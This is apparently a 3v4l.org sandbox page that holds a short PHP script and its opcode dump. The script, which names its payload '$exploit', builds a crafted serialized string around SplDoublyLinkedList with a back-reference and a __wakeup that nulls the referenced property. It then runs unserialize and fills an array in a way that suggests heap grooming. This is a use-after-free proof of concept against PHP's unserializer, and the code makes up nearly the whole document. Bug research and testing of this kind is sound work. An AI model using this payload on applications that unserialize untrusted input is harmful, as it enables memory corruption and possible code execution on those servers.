3v4l.org

run code in 200+ php & hhvm versions
Bugs & Features
<?php class a { public $a; function __wakeup() { //foreach ($this->a as $aa) { // echo($aa); //} $this->a=null; } } $inner = 'i:1;:i:1711;:i:1712;:O:1:"a":1:{s:1:"a";R:2;}:i:13;'; $exploit = 'a:3:{i:0;C:19:"SplDoublyLinkedList":'.strlen($inner).':{'.$inner.'}i:1;O:1:"a":1:{s:1:"a";i:2;}i:2;r:5;}'; $data = unserialize($exploit); for($i = 0; $i < 5; $i++) { $v[$i] = 'hi'.$i; } var_dump($data);
based on g60MY
Finding entry points
Branch analysis from position: 0
Jump found. Position 1 = 19
Branch analysis from position: 19
Jump found. Position 1 = 21, Position 2 = 14
Branch analysis from position: 21
Jump found. Position 1 = -2
Branch analysis from position: 14
Jump found. Position 1 = 21, Position 2 = 14
Branch analysis from position: 21
Branch analysis from position: 14
filename:       /in/J21qZ
function name:  (null)
number of ops:  25
compiled vars:  !0 = $inner, !1 = $exploit, !2 = $data, !3 = $i, !4 = $v
line     #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   2     0  E >   NOP                                                      
  12     1        ASSIGN                                                   !0, 'i%3A1%3B%3Ai%3A1711%3B%3Ai%3A1712%3B%3AO%3A1%3A%22a%22%3A1%3A%7Bs%3A1%3A%22a%22%3BR%3A2%3B%7D%3Ai%3A13%3B'
  13     2        STRLEN                                           ~7      !0
         3        CONCAT                                           ~8      'a%3A3%3A%7Bi%3A0%3BC%3A19%3A%22SplDoublyLinkedList%22%3A', ~7
         4        CONCAT                                           ~9      ~8, '%3A%7B'
         5        CONCAT                                           ~10     ~9, !0
         6        CONCAT                                           ~11     ~10, '%7Di%3A1%3BO%3A1%3A%22a%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7Di%3A2%3Br%3A5%3B%7D'
         7        ASSIGN                                                   !1, ~11
  15     8        INIT_FCALL                                               'unserialize'
         9        SEND_VAR                                                 !1
        10        DO_ICALL                                         $13     
        11        ASSIGN                                                   !2, $13
  17    12        ASSIGN                                                   !3, 0
        13      > JMP                                                      ->19
  18    14    >   CONCAT                                           ~17     'hi', !3
        15        ASSIGN_DIM                                               !4, !3
        16        OP_DATA                                                  ~17
  17    17        POST_INC                                         ~18     !3
        18        FREE                                                     ~18
        19    >   IS_SMALLER                                       ~19     !3, 5
        20      > JMPNZ                                                    ~19, ->14
  21    21    >   INIT_FCALL                                               'var_dump'
        22        SEND_VAR                                                 !2
        23        DO_ICALL                                                 
        24      > RETURN                                                   1

Class a:
Function __wakeup:
Finding entry points
Branch analysis from position: 0
Jump found. Position 1 = -2
filename:       /in/J21qZ
function name:  __wakeup
number of ops:  3
compiled vars:  none
line     #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   9     0  E >   ASSIGN_OBJ                                               'a'
         1        OP_DATA                                                  null
  10     2      > RETURN                                                   null

End of function __wakeup

End of class a.

Generated using Vulcan Logic Dumper, using php 7.2.0